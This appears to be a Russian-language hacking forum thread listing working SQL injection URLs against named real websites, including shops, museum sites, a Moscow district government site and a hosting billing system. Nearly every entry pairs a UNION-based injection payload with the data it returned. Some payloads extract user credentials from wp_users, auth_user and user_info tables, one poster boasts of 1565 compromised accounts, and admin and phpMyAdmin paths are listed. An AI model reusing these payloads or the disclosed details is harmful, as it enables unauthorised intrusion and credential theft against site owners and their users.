http://internetsexshop.ru/information/?id=-1+UNION+SELECT+1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13+FROM+information_schema.tables--
Бестолковый сайт Code: http://www.kkonsult.ru/print_document.php?doc_id=-42+union+select+1,2,3,group_concat%28column_name,0x3a+separator+0x0b%29,5,6,7+from+information_schema.columns+where+table_name=0x6B6B5F757365725F70726F66696C65--
Ы_ы Брест интелектульный)))))) Интелектуалы мля! Code: http://www.ibrest.net/pnews/pgb.php,ru,?nws_id=-1))+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11+--+&nwsrub=1 ibrestn_ibrestdb@localhost:ibrestn_ibrestdatabase:5.0.32-Debian_7etch6-log
Code: http://www.surveyquotes.co.uk/view-articles.php?id=7+and+1=0+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8+from+wp_users--
erotika-auktionen.de Code: http://www.erotika-auktionen.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5+-- version:5.0.51a-24+lenny2 database:usr_web130_1 user:web130@localhost www.erotikzentrum24.de Code: http://www.erotikzentrum24.de/news.php?id=-1+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5+-- version:5.0.51a-24+lenny2 database:usr_web131_1 user:web131@localhost
www.vshoes.ru Code: http://vshoes.ru/catalog.php?catid=2&index=1&tovzvetint=202&tovartik=-78700'+union+select+concat_ws(0x3a,version(),user(),database(),@@version_compile_os)--+ Database Version: 4.1.22 Database name: k2_vshoesru User name: k2_vshoesru@localhost
админкО /admin/ в robots.txt ось win mg=on ко-во атрибутов 41 есть форум 300 пользователей зарегеных pr 3 вроде
.museum 1.museum american.naturalhistory.museum - PR=4 SQL Code: http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,version%28%29,database%28%29,4,5,6,user%28%29,8/* version - 5.0.41-community-log user - ology_admin@localhost database - ology member Code: http://american.naturalhistory.museum/ology/features/ologist/stiassny/question.php?id=1+and+1=0+union+all+select+1,concat_ws%280x3a,ADJ_PART_ID_REF,NOUN_PART_ID_REF,NAME_SUFFIX,PASSWORD,HINT_WORD_ID_REF,HINTWORD,MEMBER_CREATED,LAST_LOGIN,MEMBER_STATUS%29,PASSWORD,4,5,6,MEMBER_STATUS,8+from+member+limit+0,1/* 2.museum santelmo.donostia.museum SQL Code: http://www.santelmo.donostia.museum/eus/publicacionesdeexposicionesmasinfo.php?op=5&ver=todo&titulo=&autor=&anno=&id=1+and+1=1+union+all+select+1,2,3,version%28%29,database%28%29,user%28%29,7,8,9,10,11,12 version - 5.0.51a-3ubuntu5.5 user - bbdd_museode@localhost database - santelmo
Code: http://avtoarenda.com.ua/ind.php?option=com_tourist&mid=54&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7+--+ avtoarenda_site@localhost:5.1.41:avtoarenda_site Code: http://www.obtainsearch.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,group_concat(database(),0x3a,user(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&tr=1 doskapost:[email protected]:5.0.67.d7-ourdelta-log Code: http://www.avtostolica.com.ua/ind.php?id=-1+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9+--+ news@localhost:news:5.0.51a-24+lenny2-log Code: http://www.siac.com.sg/details.php?id=56+union+select+1,concat(unhex(hex(user())),0x3a,unhex(hex(database())),0x3a,unhex(hex(version()))),3,4,5,6,7,8,9+--+ root@localhost:siacdb:4.1.10-standard-log
Code: http://www.webnewshub.com/story1.php?nid=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(version(),14))+as+t+JOIN+(SELECT+NAME_CONST(version(),14))b)c) version: 5.0.83-log
Перехакал)) 1565 аккаунтов!))) Code: http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(version(),0x3a,user(),0x3a,database()),3+--+&rcid=2 version: 5.0.83-log user: [email protected] database: webnewshub Code: http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(schema_name),3+from+information_schema.schemata+--+&rcid=2 databases: information_schema,webnewshub Code: http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x7765626e657773687562+--+&rcid=2 tables: adv_detail adv_master c_category c_subcat_master c_subcategory category country gallery gallery_category gallery_images game news_comments news_ip_votes news_master news_tags newsletter poll_ips poll_master poll_options ref_category ref_master rss_category rss_feed,state tags user_info Code: http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x757365725f696e666f+--+&rcid=2 user_info columns: user_id display_name user_name u_email password user_type country phone_no reg_date email_flag status Code: http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(user_name,0x3a,password,0x3a,u_email),3+from+user_info+where+user_name=0x53616e6479+--+&rcid=2
Code: http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,database(),0x3a,version()),10,11,12+--+ eco2000@localhost:eco2000_noticias:5.0.89-community-log Прикольное название) Code: http://www.computer-and-bees.com/board/ind.php?pn=53&id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+ pavl2004_pavl@localhostavl2004_links:5.0.37 Code: http://sillacinema.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1 sillacin_test@localhost:sillacin_test:5.0.89-community user:id,email,login,pass,name,surname,state,city,report login:id,user,pass,sess,rights,rname,mail,editor
PR: 7[+] User: root@localhost [-] Version: 4.1.22-community-nt Database: newenfocus Code: http://www.enfocus.com/flows.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13-- [+] admin panel: Code: [COLOR=Lime]http://www.enfocus.com/admin/[/COLOR] [+] phpMyAdmin: Code: [COLOR=Lime]http://www.enfocus.com/phpMyAdmin/[/COLOR] ---===--- PR: 6[+] Version: 5.0.89-community User: sciences_cms@localhost Database: sciences_cms Code: http://www.sciencescotland.org/feature.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8-- ---===--- PR: 5[+] Version: 5.0.45 User: transcoalition@localhost Database: transcoalition Code: http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4,5+from+auth_user--
bes.sao.mos.ru Code: http://bes.sao.mos.ru/news_full.php?id=28333+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User(),0x3a,@@version_compile_os),0x71),0x71),3,4,5+LIMIT+1,1-- Database Version: 4.1.12 Database name: sao User name: sao@chicken OS: redhat-linux-gnu
стыдно конечно но не докрутил скулю (даже не узнал version) если кто-нибудь докрутит скиньте мне вличку please как. http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,42--+
джокестера заслуга бес скобок крутить то можно ... http://fitnesslife.com.ua/myadmin/index.php привилегий на читалку для текущого пользователя нет, ищем пхпмайдмин юзаем читалку, смотрим пхпинфо
Всё в открытом виде, но походу он дохлый уже давно Code: http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16-- 5.0.89-community:dsthosti_coin1:dsthosti_admin@localhost tables Code: phpcoin_admins,phpcoin_articles,phpcoin_banned,phpcoin_categories,phpcoin_clients,phpcoin_clients_contacts,phpcoin_components,phpcoin_domains,phpcoin_faq,phpcoin_faq_qa,phpcoin_helpdesk,phpcoin_helpdesk_msgs,phpcoin_icons,phpcoin_invoices,phpcoin_invoices_items,phpcoin_invoices_trans,phpcoin_mail_archive,phpcoin_mail_contacts,phpcoin_mail_queue,phpcoin_mail_templates,phpcoin_menu_blocks,phpcoin_menu_blocks_items,phpcoin_orders,phpcoin_orders_sessions,phpcoin_pages,phpcoin_parameters,phpcoin_products,phpcoin_reminders,phpcoin_server_info,phpcoin_sessions,phpcoin_site_info,phpcoin_topics,phpcoin_vendors,phpcoin_vendors_prods,phpcoin_versions,phpcoin_whois phpcoin_domains columns Code: dom_id,dom_cl_id,dom_domain,dom_status,dom_type,dom_registrar,dom_ts_expiration,dom_sa_expiration,dom_si_id,dom_ip,dom_pathdom_path_temp,dom_url_cp,dom_user_name_cp,dom_user_pword_cp,dom_user_name_ftp,dom_user_pword_ftp,dom_allow_domains,dom_allow_subdomains,dom_allow_disk_space_mb,dom_allow_traffic_mb,dom_allow_mailboxes,dom_allow_databases,dom_enable_www_prefix,dom_enable_wu_scripting,dom_enable_webmail,dom_enable_frontpage,dom_enable_fromtpage_ssl,dom_enable_ssi,dom_enable_php,dom_enable_cgi,dom_enable_mod_perl,dom_enable_asp,dom_enable_ssl,dom_enable_stats,dom_enable_err_docs,dom_notes
mssql перебирать впадляк но понятно что можно какой то софт взять но сам пробывал ... БД:dbo,guest,INFORMATION_SCHEMA,sys,Ian,iea_reader,iea_data,Writer,Reader,db_owner... Таблица PASSWORD_T: 'A','ACCESS_LEVEL','ADDRESS' ,'AFRICA','AIM' ,'ALUMNI','ANCHOR_NAME' ,'ARCHIVE_START' ,archiveid','ARRIVAL_DATE' ... имя БД : версия: Кстати здесь идеальная ошибка как писал забаненый cash --> Unclosed quotation mark after the character string
